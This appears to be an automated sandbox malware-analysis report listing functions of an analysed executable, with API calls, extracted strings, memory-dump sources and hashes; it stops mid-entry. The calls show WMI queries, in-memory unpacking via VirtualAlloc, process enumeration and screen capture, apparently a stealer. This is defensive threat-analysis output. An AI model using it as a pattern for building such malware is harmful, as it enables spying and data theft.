Function 0040C506 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A

Strings

<(@, xrefs: 0040C53D
ios_base::failbit set, xrefs: 0040C506

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: <(@$ios_base::failbit set
API String ID: 4194217158-2207043977
Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC

Function 0041D9FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
__CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51

Strings

pContext, xrefs: 0041DA3B

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1687795959-2046700901
Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98

Function 0044067A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440681

Strings

RCC, xrefs: 004406B3
MOC, xrefs: 004406A4

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA

Function 00404DFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32

Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46

Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096

Strings

F@, xrefs: 00404E3E

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
Opcode Fuzzy Hash: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C

Function 00428D67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
__CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A

Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D

Strings

Access violation - no RTTI data!, xrefs: 00428D6A

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
Instruction ID: 73ada6d1c6168317e08ecea3a8bb530ed306f4920f562436bdd15de4f867cbc4
Opcode Fuzzy Hash: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
Instruction Fuzzy Hash: FDE0DF726593186A9A04DA91B8469DE73EC8A14300BA0041FBE0092082EF2CF958826D

Function 0042380B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E

Strings

nB, xrefs: 00423817
jB, xrefs: 00423811

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: jB$nB
API String ID: 3275300208-1818383504
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC

Function 004212AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212D9

Strings

pThreadProxy, xrefs: 004212C3

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC

Function 0042AE7A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
GetLastError.KERNEL32 ref: 0042AF1E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A

Analysis Process: D1F3.tmp.exePID: 7936, Parent PID: 7812COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	20.3%
Signature Coverage:	40.5%
Total number of Nodes:	158
Total number of Limit Nodes:	13

Executed Functions

Function 0043B870 Relevance: 37.6, APIs: 11, Strings: 10, Instructions: 880
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
VariantInit.OLEAUT32(?), ref: 0043BF3E
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243

Strings

[&h$, xrefs: 0043BE32
96, xrefs: 0043BE52
n:T8, xrefs: 0043BE4A
#~|, xrefs: 0043B8A7
k"@ , xrefs: 0043BE3A
#~|, xrefs: 0043B89D
F*R(, xrefs: 0043BE2A
M, xrefs: 0043BB5B
:;$%, xrefs: 0043C2EC
e?^, xrefs: 0043BC4F

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 1810270423-2807872674
Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96

Function 00415720 Relevance: 19.3, APIs: 1, Strings: 9, Instructions: 1798COMMON

Download Yara Rule

Strings

NR@:, xrefs: 00416291
Cq, xrefs: 00415AF1, 00415D9B, 00416862, 00416B31, 00416E4A
9?4<, xrefs: 00416345
BYQZ, xrefs: 00416286
L, xrefs: 004162B2
R(RW, xrefs: 00416265
a, xrefs: 004163D3
F2}0, xrefs: 00415A76
DASS, xrefs: 0041629C

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq$9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
API String ID: 0-2106288537
Opcode ID: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
Opcode Fuzzy Hash: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004088A4
GetCurrentThreadId.KERNEL32 ref: 004088AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
GetForegroundWindow.USER32 ref: 0040896A
ExitProcess.KERNEL32 ref: 00408AB7

Strings

6W01, xrefs: 004089B5

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MO, xrefs: 0040AA37
MO, xrefs: 0040A9CF

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

Function 004402C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 020D003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020D024D

Strings

kernel32.dll, xrefs: 020D008F, 020D0095
cess, xrefs: 020D018D

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: dca78506bd68bbaebe83f703c92878055dae886c6e97be66cdc185833bc2fdca
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 62525A74A01229DFDB64CF58C984BACBBB1BF09314F1480D9E94DAB351DB30AA95DF14

Function 0040E3D3 Relevance: 3.1, APIs: 2, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

Function 005407A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005407CE
Module32First.KERNEL32(00000000,00000224), ref: 005407EE

Memory Dump Source

Source File: 00000004.00000002.1712229018.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_540000_D1F3.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 0cf283d98efe61e3cd9481b54c82bc3f55ec36781a81dceacc3b71ca884935ef
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BBF062311017116BD7203AB5988DAAF7AE8FF89769F201528E742910C0DA74F8454A62

Function 020D0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,020D0223,?,?), ref: 020D0E19
SetErrorMode.KERNELBASE(00000000,?,?,020D0223,?,?), ref: 020D0E1E

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 6694f36606793361b509c331fc2bc32e2ccd64f7af50ad39e78bfb29505a1a99
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 87D0123114522877D7412AA4DC09BCD7B5CDF05B66F008011FB0DD9080C770954046E9

Function 0040DF92 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
Opcode Fuzzy Hash: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909

Function 0040AB12 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 0040AB46

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A

Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8

Function 004404B1 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004404BF

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59

Function 0043EB20 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698

Function 00540465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005404B6

Memory Dump Source

Source File: 00000004.00000002.1712229018.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_540000_D1F3.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 50dd362a1b8c8ae9f1864809fe64922e881f4706fdd5c4cbaf7c294925ff0706
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 6B112B79A40208EFDB01DF98C985E98BFF5AF08350F158094FA489B362D375EA50DF80

Non-executed Functions

Function 0210BAD7 Relevance: 32.4, APIs: 8, Strings: 10, Instructions: 880memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0210BF33
SysAllocString.OLEAUT32(37C935C6), ref: 0210BFAD
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0210BFEB
SysAllocString.OLEAUT32(37C935C6), ref: 0210C050
SysAllocString.OLEAUT32(37C935C6), ref: 0210C137
VariantInit.OLEAUT32(?), ref: 0210C1A5

Strings

#~|, xrefs: 0210BB04
M, xrefs: 0210BDC2
F*R(, xrefs: 0210C091
n:T8, xrefs: 0210C0B1
:;$%, xrefs: 0210C553
k"@ , xrefs: 0210C0A1
#~|, xrefs: 0210BB0E
96, xrefs: 0210C0B9
e?^, xrefs: 0210BEB6
[&h$, xrefs: 0210C099

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 65563702-2807872674
Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction ID: 2f0fb45dce10e3bf422c1f747b1719fd0a3c2835e69f17815aa620558fa6863b
Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
Instruction Fuzzy Hash: 2C52EE726483408BD724CF68C8917ABFBE1EFC5314F188A2DE5958B391D7B4D806CB92

Function 00436980 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 230windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00436989
GetSystemMetrics.USER32(0000004C), ref: 00436999
GetSystemMetrics.USER32(0000004D), ref: 004369A1
GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
DeleteObject.GDI32(00000000), ref: 004369C1
CreateCompatibleDC.GDI32(00000000), ref: 004369D0
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
SelectObject.GDI32(00000000,00000000), ref: 004369E7
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A

Strings

Y, xrefs: 00436BEE

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

